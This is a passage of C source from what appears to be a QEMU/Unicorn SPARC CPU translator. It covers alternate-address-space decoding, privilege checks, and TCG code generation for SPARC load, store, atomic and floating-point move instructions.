#ifndef TARGET_SPARC64 /* Before v9, all asis are immediate and privileged. */ if (IS_IMM) { gen_exception(dc, TT_ILL_INSN); type = GET_ASI_EXCP; } else if (supervisor(dc) /* Note that LEON accepts ASI_USERDATA in user mode, for use with CASA. Also note that previous versions of QEMU allowed (and old versions of gcc emitted) ASI_P for LEON, which is incorrect. 
*/ || (asi == ASI_USERDATA && (dc->def->features & CPU_FEATURE_CASA))) { switch (asi) { case ASI_USERDATA: /* User data access */ mem_idx = MMU_USER_IDX; type = GET_ASI_DIRECT; break; case ASI_KERNELDATA: /* Supervisor data access */ mem_idx = MMU_KERNEL_IDX; type = GET_ASI_DIRECT; break; case ASI_M_BYPASS: /* MMU passthrough */ case ASI_LEON_BYPASS: /* LEON MMU passthrough */ mem_idx = MMU_PHYS_IDX; type = GET_ASI_DIRECT; break; case ASI_M_BCOPY: /* Block copy, sta access */ mem_idx = MMU_KERNEL_IDX; type = GET_ASI_BCOPY; break; case ASI_M_BFILL: /* Block fill, stda access */ mem_idx = MMU_KERNEL_IDX; type = GET_ASI_BFILL; break; } /* MMU_PHYS_IDX is used when the MMU is disabled to passthrough the * permissions check in get_physical_address(..). */ mem_idx = (dc->mem_idx == MMU_PHYS_IDX) ? MMU_PHYS_IDX : mem_idx; } else { gen_exception(dc, TT_PRIV_INSN); type = GET_ASI_EXCP; } #else if (IS_IMM) { asi = dc->asi; } /* With v9, all asis below 0x80 are privileged. */ /* ??? We ought to check cpu_has_hypervisor, but we didn't copy down that bit into DisasContext. For the moment that's ok, since the direct implementations below don't have any ASIs in the restricted [0x30, 0x7f] range, and the check will be done properly in the helper. */ if (!supervisor(dc) && asi < 0x80) { gen_exception(dc, TT_PRIV_ACT); type = GET_ASI_EXCP; } else { switch (asi) { case ASI_REAL: /* Bypass */ case ASI_REAL_IO: /* Bypass, non-cacheable */ case ASI_REAL_L: /* Bypass LE */ case ASI_REAL_IO_L: /* Bypass, non-cacheable LE */ case ASI_TWINX_REAL: /* Real address, twinx */ case ASI_TWINX_REAL_L: /* Real address, twinx, LE */ case ASI_QUAD_LDD_PHYS: case ASI_QUAD_LDD_PHYS_L: mem_idx = MMU_PHYS_IDX; break; case ASI_N: /* Nucleus */ case ASI_NL: /* Nucleus LE */ case ASI_TWINX_N: case ASI_TWINX_NL: case ASI_NUCLEUS_QUAD_LDD: case ASI_NUCLEUS_QUAD_LDD_L: if (hypervisor(dc)) { mem_idx = MMU_PHYS_IDX; } else { mem_idx = MMU_NUCLEUS_IDX; } break; case ASI_AIUP: /* As if user primary */ case ASI_AIUPL: /* As if user primary LE */ case ASI_TWINX_AIUP: case ASI_TWINX_AIUP_L: case ASI_BLK_AIUP_4V: case ASI_BLK_AIUP_L_4V: case ASI_BLK_AIUP: case ASI_BLK_AIUPL: mem_idx = MMU_USER_IDX; break; case ASI_AIUS: /* As if user secondary */ case ASI_AIUSL: /* As if user secondary LE */ case ASI_TWINX_AIUS: case ASI_TWINX_AIUS_L: case ASI_BLK_AIUS_4V: case ASI_BLK_AIUS_L_4V: case ASI_BLK_AIUS: case ASI_BLK_AIUSL: mem_idx = MMU_USER_SECONDARY_IDX; break; case ASI_S: /* Secondary */ case ASI_SL: /* Secondary LE */ case ASI_TWINX_S: case ASI_TWINX_SL: case ASI_BLK_COMMIT_S: case ASI_BLK_S: case ASI_BLK_SL: case ASI_FL8_S: case ASI_FL8_SL: case ASI_FL16_S: case ASI_FL16_SL: if (mem_idx == MMU_USER_IDX) { mem_idx = MMU_USER_SECONDARY_IDX; } else if (mem_idx == MMU_KERNEL_IDX) { mem_idx = MMU_KERNEL_SECONDARY_IDX; } break; case ASI_P: /* Primary */ case ASI_PL: /* Primary LE */ case ASI_TWINX_P: case ASI_TWINX_PL: case ASI_BLK_COMMIT_P: case ASI_BLK_P: case ASI_BLK_PL: case ASI_FL8_P: case ASI_FL8_PL: case ASI_FL16_P: case ASI_FL16_PL: break; } switch (asi) { case ASI_REAL: case ASI_REAL_IO: case ASI_REAL_L: case ASI_REAL_IO_L: case ASI_N: case ASI_NL: case ASI_AIUP: case ASI_AIUPL: case ASI_AIUS: case ASI_AIUSL: case ASI_S: case ASI_SL: case ASI_P: case ASI_PL: type = GET_ASI_DIRECT; break; case ASI_TWINX_REAL: case ASI_TWINX_REAL_L: case ASI_TWINX_N: case ASI_TWINX_NL: case ASI_TWINX_AIUP: case ASI_TWINX_AIUP_L: case ASI_TWINX_AIUS: case ASI_TWINX_AIUS_L: case ASI_TWINX_P: case ASI_TWINX_PL: case ASI_TWINX_S: case ASI_TWINX_SL: case
ASI_QUAD_LDD_PHYS: case ASI_QUAD_LDD_PHYS_L: case ASI_NUCLEUS_QUAD_LDD: case ASI_NUCLEUS_QUAD_LDD_L: type = GET_ASI_DTWINX; break; case ASI_BLK_COMMIT_P: case ASI_BLK_COMMIT_S: case ASI_BLK_AIUP_4V: case ASI_BLK_AIUP_L_4V: case ASI_BLK_AIUP: case ASI_BLK_AIUPL: case ASI_BLK_AIUS_4V: case ASI_BLK_AIUS_L_4V: case ASI_BLK_AIUS: case ASI_BLK_AIUSL: case ASI_BLK_S: case ASI_BLK_SL: case ASI_BLK_P: case ASI_BLK_PL: type = GET_ASI_BLOCK; break; case ASI_FL8_S: case ASI_FL8_SL: case ASI_FL8_P: case ASI_FL8_PL: memop = MO_UB; type = GET_ASI_SHORT; break; case ASI_FL16_S: case ASI_FL16_SL: case ASI_FL16_P: case ASI_FL16_PL: memop = MO_TEUW; type = GET_ASI_SHORT; break; } /* The little-endian asis all have bit 3 set. */ if (asi & 8) { memop ^= MO_BSWAP; } } #endif return (DisasASI){ type, asi, mem_idx, memop }; } static void gen_ld_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn, MemOp memop) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, memop); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DTWINX: /* Reserved for ldda. */ gen_exception(dc, TT_ILL_INSN); break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_ld_tl(tcg_ctx, dst, addr, da.mem_idx, da.memop); break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, memop); save_state(dc); #ifdef TARGET_SPARC64 gen_helper_ld_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, r_asi, r_mop); #else { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); tcg_temp_free_i64(tcg_ctx, t64); } #endif tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } } static void gen_st_asi(DisasContext *dc, TCGv src, TCGv addr, int insn, MemOp memop) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, memop); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DTWINX: /* Reserved for stda. */ #ifndef TARGET_SPARC64 gen_exception(dc, TT_ILL_INSN); break; #else if (!(dc->def->features & CPU_FEATURE_HYPV)) { /* Pre OpenSPARC CPUs don't have these */ gen_exception(dc, TT_ILL_INSN); return; } /* in OpenSPARC T1+ CPUs TWINX ASIs in store instructions * are ST_BLKINIT_ ASIs */ /* fall through */ #endif case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_st_tl(tcg_ctx, src, addr, da.mem_idx, da.memop); break; #if !defined(TARGET_SPARC64) case GET_ASI_BCOPY: /* Copy 32 bytes from the address in SRC to ADDR. */ /* ??? The original qemu code suggests 4-byte alignment, dropping the low bits, but the only place I can see this used is in the Linux kernel with 32 byte alignment, which would make more sense as a cacheline-style operation. */ { TCGv saddr = tcg_temp_new(tcg_ctx); TCGv daddr = tcg_temp_new(tcg_ctx); TCGv four = tcg_const_tl(tcg_ctx, 4); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); int i; tcg_gen_andi_tl(tcg_ctx, saddr, src, -4); tcg_gen_andi_tl(tcg_ctx, daddr, addr, -4); for (i = 0; i < 32; i += 4) { /* Since the loads and stores are paired, allow the copy to happen in the host endianness. 
*/ tcg_gen_qemu_ld_i32(tcg_ctx, tmp, saddr, da.mem_idx, MO_UL); tcg_gen_qemu_st_i32(tcg_ctx, tmp, daddr, da.mem_idx, MO_UL); tcg_gen_add_tl(tcg_ctx, saddr, saddr, four); tcg_gen_add_tl(tcg_ctx, daddr, daddr, four); } tcg_temp_free(tcg_ctx, saddr); tcg_temp_free(tcg_ctx, daddr); tcg_temp_free(tcg_ctx, four); tcg_temp_free_i32(tcg_ctx, tmp); } break; #endif default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, memop & MO_SIZE); save_state(dc); #ifdef TARGET_SPARC64 gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, src, r_asi, r_mop); #else { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t64, src); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_mop); tcg_temp_free_i64(tcg_ctx, t64); } #endif tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); /* A write to a TLB register may alter page maps. End the TB. */ dc->npc = DYNAMIC_PC; } break; } } static void gen_swap_asi(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int insn) { DisasASI da = get_asi(dc, insn, MO_TEUL); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_swap(dc, dst, src, addr, da.mem_idx, da.memop); break; default: /* ??? Should be DAE_invalid_asi. */ gen_exception(dc, TT_DATA_ACCESS); break; } } static void gen_cas_asi(DisasContext *dc, TCGv addr, TCGv cmpv, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEUL); TCGv oldv; switch (da.type) { case GET_ASI_EXCP: return; case GET_ASI_DIRECT: oldv = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, oldv, addr, cmpv, gen_load_gpr(dc, rd), da.mem_idx, da.memop); gen_store_gpr(dc, rd, oldv); tcg_temp_free(tcg_ctx, oldv); break; default: /* ??? Should be DAE_invalid_asi. */ gen_exception(dc, TT_DATA_ACCESS); break; } } static void gen_ldstub_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_UB); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_ldstub(dc, dst, addr, da.mem_idx); break; default: /* ??? In theory, this should raise DAE_invalid_asi. But the SS-20 roms do ldstuba [%l0] #ASI_M_CTL, %o1. */ if (tb_cflags(dc->base.tb) & CF_PARALLEL) { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); } else { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, MO_UB); TCGv_i64 s64, t64; save_state(dc); t64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_mop); s64 = tcg_const_i64(tcg_ctx, 0xff); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, s64, r_asi, r_mop); tcg_temp_free_i64(tcg_ctx, s64); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); tcg_temp_free_i64(tcg_ctx, t64); /* End the TB. */ dc->npc = DYNAMIC_PC; } break; } } #ifdef TARGET_SPARC64 static void gen_ldf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, (size == 4 ?
MO_TEUL : MO_TEQ)); TCGv_i32 d32; TCGv_i64 d64; switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); switch (size) { case 4: d32 = gen_dest_fpr_F(dc); tcg_gen_qemu_ld_i32(tcg_ctx, d32, addr, da.mem_idx, da.memop); gen_store_fpr_F(dc, rd, d32); break; case 8: tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop | MO_ALIGN_4); break; case 16: d64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, d64, addr, da.mem_idx, da.memop | MO_ALIGN_4); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd/2+1], addr, da.mem_idx, da.memop | MO_ALIGN_4); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], d64); tcg_temp_free_i64(tcg_ctx, d64); break; default: g_assert_not_reached(); } break; case GET_ASI_BLOCK: /* Valid for lddfa on aligned registers only. */ if (size == 8 && (rd & 7) == 0) { MemOp memop; TCGv eight; int i; gen_address_mask(dc, addr); /* The first operation checks required alignment. */ memop = da.memop | MO_ALIGN_64; eight = tcg_const_tl(tcg_ctx, 8); for (i = 0; ; ++i) { tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + i], addr, da.mem_idx, memop); if (i == 7) { break; } tcg_gen_add_tl(tcg_ctx, addr, addr, eight); memop = da.memop; } tcg_temp_free(tcg_ctx, eight); } else { gen_exception(dc, TT_ILL_INSN); } break; case GET_ASI_SHORT: /* Valid for lddfa only. */ if (size == 8) { gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop); } else { gen_exception(dc, TT_ILL_INSN); } break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, da.memop); save_state(dc); /* According to the table in the UA2011 manual, the only other asis that are valid for ldfa/lddfa/ldqfa are the NO_FAULT asis. We still need a helper for these, but we can just use the integer asi helper for them. */ switch (size) { case 4: d64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, d64, tcg_ctx->cpu_env, addr, r_asi, r_mop); d32 = gen_dest_fpr_F(dc); tcg_gen_extrl_i64_i32(tcg_ctx, d32, d64); tcg_temp_free_i64(tcg_ctx, d64); gen_store_fpr_F(dc, rd, d32); break; case 8: gen_helper_ld_asi(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], tcg_ctx->cpu_env, addr, r_asi, r_mop); break; case 16: d64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, d64, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); gen_helper_ld_asi(tcg_ctx, tcg_ctx->cpu_fpr[rd/2+1], tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], d64); tcg_temp_free_i64(tcg_ctx, d64); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } } static void gen_stf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, (size == 4 ? MO_TEUL : MO_TEQ)); TCGv_i32 d32; switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); switch (size) { case 4: d32 = gen_load_fpr_F(dc, rd); tcg_gen_qemu_st_i32(tcg_ctx, d32, addr, da.mem_idx, da.memop); break; case 8: tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop | MO_ALIGN_4); break; case 16: /* Only 4-byte alignment required. However, it is legal for the cpu to signal the alignment fault, and the OS trap handler is required to fix it up. 
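E.g. an 8-byte-aligned but not 16-byte-aligned quad store is architecturally legal, yet we may fault on it and let the guest kernel emulate the access.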
Requiring 16-byte alignment here avoids having to probe the second page before performing the first write. */ tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd/2+1], addr, da.mem_idx, da.memop); break; default: g_assert_not_reached(); } break; case GET_ASI_BLOCK: /* Valid for stdfa on aligned registers only. */ if (size == 8 && (rd & 7) == 0) { MemOp memop; TCGv eight; int i; gen_address_mask(dc, addr); /* The first operation checks required alignment. */ memop = da.memop | MO_ALIGN_64; eight = tcg_const_tl(tcg_ctx, 8); for (i = 0; ; ++i) { tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + i], addr, da.mem_idx, memop); if (i == 7) { break; } tcg_gen_add_tl(tcg_ctx, addr, addr, eight); memop = da.memop; } tcg_temp_free(tcg_ctx, eight); } else { gen_exception(dc, TT_ILL_INSN); } break; case GET_ASI_SHORT: /* Valid for stdfa only. */ if (size == 8) { gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop); } else { gen_exception(dc, TT_ILL_INSN); } break; default: /* According to the table in the UA2011 manual, the only other asis that are valid for stfa/stdfa/stqfa are the PST* asis, which aren't currently handled. */ gen_exception(dc, TT_ILL_INSN); break; } } static void gen_ldda_asi(DisasContext *dc, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv_i64 hi = gen_dest_gpr(dc, rd); TCGv_i64 lo = gen_dest_gpr(dc, rd + 1); switch (da.type) { case GET_ASI_EXCP: return; case GET_ASI_DTWINX: gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, hi, addr, da.mem_idx, da.memop | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, lo, addr, da.mem_idx, da.memop); break; case GET_ASI_DIRECT: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, addr, da.mem_idx, da.memop); /* Note that LE ldda acts as if each 32-bit register result is byte swapped. Having just performed one 64-bit bswap, we need now to swap the writebacks. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_extr32_i64(tcg_ctx, lo, hi, tmp); } else { tcg_gen_extr32_i64(tcg_ctx, hi, lo, tmp); } tcg_temp_free_i64(tcg_ctx, tmp); } break; default: /* ??? In theory we've handled all of the ASIs that are valid for ldda, and this should raise DAE_invalid_asi. However, real hardware allows others. This can be seen with e.g. FreeBSD 10.3 wrt ASI_IC_TAG. */ { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, da.memop); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); save_state(dc); gen_helper_ld_asi(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); tcg_temp_free_i32(tcg_ctx, r_mop); /* See above.
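The LE ldda writeback swap applies to this helper path as well.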
*/ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_extr32_i64(tcg_ctx, lo, hi, tmp); } else { tcg_gen_extr32_i64(tcg_ctx, hi, lo, tmp); } tcg_temp_free_i64(tcg_ctx, tmp); } break; } gen_store_gpr(dc, rd, hi); gen_store_gpr(dc, rd + 1, lo); } static void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv lo = gen_load_gpr(dc, rd + 1); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DTWINX: gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, hi, addr, da.mem_idx, da.memop | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_st_i64(tcg_ctx, lo, addr, da.mem_idx, da.memop); break; case GET_ASI_DIRECT: { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); /* Note that LE stda acts as if each 32-bit register result is byte swapped. We will perform one 64-bit LE store, so now we must swap the order of the construction. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_concat32_i64(tcg_ctx, t64, lo, hi); } else { tcg_gen_concat32_i64(tcg_ctx, t64, hi, lo); } gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, t64, addr, da.mem_idx, da.memop); tcg_temp_free_i64(tcg_ctx, t64); } break; default: /* ??? In theory we've handled all of the ASIs that are valid for stda, and this should raise DAE_invalid_asi. */ { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, da.memop); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); /* See above. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_concat32_i64(tcg_ctx, t64, lo, hi); } else { tcg_gen_concat32_i64(tcg_ctx, t64, hi, lo); } save_state(dc); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); tcg_temp_free_i64(tcg_ctx, t64); } break; } } static void gen_casx_asi(DisasContext *dc, TCGv addr, TCGv cmpv, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv oldv; switch (da.type) { case GET_ASI_EXCP: return; case GET_ASI_DIRECT: oldv = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, oldv, addr, cmpv, gen_load_gpr(dc, rd), da.mem_idx, da.memop); gen_store_gpr(dc, rd, oldv); tcg_temp_free(tcg_ctx, oldv); break; default: /* ??? Should be DAE_invalid_asi. */ gen_exception(dc, TT_DATA_ACCESS); break; } } #else static void gen_ldda_asi(DisasContext *dc, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* ??? Work around an apparent bug in Ubuntu gcc 4.8.2-10ubuntu2+12, whereby "rd + 1" elicits "error: array subscript is above array". Since we have already asserted that rd is even, the semantics are unchanged. 
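Concretely, for an even rd the low bit is already clear, so rd | 1 == rd + 1 (e.g. 6 | 1 == 7).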
*/ TCGv lo = gen_dest_gpr(dc, rd | 1); TCGv hi = gen_dest_gpr(dc, rd); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); DisasASI da = get_asi(dc, insn, MO_TEQ); switch (da.type) { case GET_ASI_EXCP: tcg_temp_free_i64(tcg_ctx, t64); return; case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, t64, addr, da.mem_idx, da.memop); break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, MO_Q); save_state(dc); gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } tcg_gen_extr_i64_i32(tcg_ctx, lo, hi, t64); tcg_temp_free_i64(tcg_ctx, t64); gen_store_gpr(dc, rd | 1, lo); gen_store_gpr(dc, rd, hi); } static void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv lo = gen_load_gpr(dc, rd + 1); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, hi); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, t64, addr, da.mem_idx, da.memop); break; case GET_ASI_BFILL: /* Store 32 bytes of T64 to ADDR. */ /* ??? The original qemu code suggests 8-byte alignment, dropping the low bits, but the only place I can see this used is in the Linux kernel with 32 byte alignment, which would make more sense as a cacheline-style operation. */ { TCGv d_addr = tcg_temp_new(tcg_ctx); TCGv eight = tcg_const_tl(tcg_ctx, 8); int i; tcg_gen_andi_tl(tcg_ctx, d_addr, addr, -8); for (i = 0; i < 32; i += 8) { tcg_gen_qemu_st_i64(tcg_ctx, t64, d_addr, da.mem_idx, da.memop); tcg_gen_add_tl(tcg_ctx, d_addr, d_addr, eight); } tcg_temp_free(tcg_ctx, d_addr); tcg_temp_free(tcg_ctx, eight); } break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, MO_Q); save_state(dc); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } tcg_temp_free_i64(tcg_ctx, t64); } #endif static TCGv get_src1(DisasContext *dc, unsigned int insn) { unsigned int rs1 = GET_FIELD(insn, 13, 17); return gen_load_gpr(dc, rs1); } static TCGv get_src2(DisasContext *dc, unsigned int insn) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (IS_IMM) { /* immediate */ target_long simm = GET_FIELDs(insn, 19, 31); TCGv t = get_temp_tl(dc); tcg_gen_movi_tl(tcg_ctx, t, simm); return t; } else { /* register */ unsigned int rs2 = GET_FIELD(insn, 27, 31); return gen_load_gpr(dc, rs2); } } #ifdef TARGET_SPARC64 static void gen_fmovs(DisasContext *dc, DisasCompare *cmp, int rd, int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 c32, zero, dst, s1, s2; /* We have two choices here: extend the 32 bit data and use movcond_i64, or fold the comparison down to 32 bits and use movcond_i32. Choose the latter.
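Folding down costs one setcond_i64 plus a truncation when the condition is not already a boolean, rather than extending both 32-bit data operands to 64 bits.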
*/ c32 = tcg_temp_new_i32(tcg_ctx); if (cmp->is_bool) { tcg_gen_extrl_i64_i32(tcg_ctx, c32, cmp->c1); } else { TCGv_i64 c64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cmp->cond, c64, cmp->c1, cmp->c2); tcg_gen_extrl_i64_i32(tcg_ctx, c32, c64); tcg_temp_free_i64(tcg_ctx, c64); } s1 = gen_load_fpr_F(dc, rs); s2 = gen_load_fpr_F(dc, rd); dst = gen_dest_fpr_F(dc); zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dst, c32, zero, s1, s2); tcg_temp_free_i32(tcg_ctx, c32); tcg_temp_free_i32(tcg_ctx, zero); gen_store_fpr_F(dc, rd, dst); } static void gen_fmovd(DisasContext *dc, DisasCompare *cmp, int rd, int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst = gen_dest_fpr_D(dc, rd); tcg_gen_movcond_i64(tcg_ctx, cmp->cond, dst, cmp->c1, cmp->c2, gen_load_fpr_D(dc, rs), gen_load_fpr_D(dc, rd)); gen_store_fpr_D(dc, rd, dst); } static void gen_fmovq(DisasContext *dc, DisasCompare *cmp, int rd, int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; int qd = QFPREG(rd); int qs = QFPREG(rs); tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2], cmp->c1, cmp->c2, tcg_ctx->cpu_fpr[qs / 2], tcg_ctx->cpu_fpr[qd / 2]); tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2 + 1], cmp->c1, cmp->c2, tcg_ctx->cpu_fpr[qs / 2 + 1], tcg_ctx->cpu_fpr[qd / 2 + 1]); gen_update_fprs_dirty(dc, qd); } static inline void gen_load_trap_state_at_tl(TCGContext *tcg_ctx, TCGv_ptr r_tsptr, TCGv_env cpu_env) { TCGv_i32 r_tl = tcg_temp_new_i32(tcg_ctx); /* load env->tl into r_tl */ tcg_gen_ld_i32(tcg_ctx, r_tl, cpu_env, offsetof(CPUSPARCState, tl)); /* tl = [0 ... MAXTL_MASK] where MAXTL_MASK must be power of 2 */ tcg_gen_andi_i32(tcg_ctx, r_tl, r_tl, MAXTL_MASK); /* calculate offset to current trap state from env->ts, reuse r_tl */ tcg_gen_muli_i32(tcg_ctx, r_tl, r_tl, sizeof (trap_state)); tcg_gen_addi_ptr(tcg_ctx, r_tsptr, cpu_env, offsetof(CPUSPARCState, ts)); /* tsptr = env->ts[env->tl & MAXTL_MASK] */ { TCGv_ptr r_tl_tmp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ext_i32_ptr(tcg_ctx, r_tl_tmp, r_tl); tcg_gen_add_ptr(tcg_ctx, r_tsptr, r_tsptr, r_tl_tmp); tcg_temp_free_ptr(tcg_ctx, r_tl_tmp); } 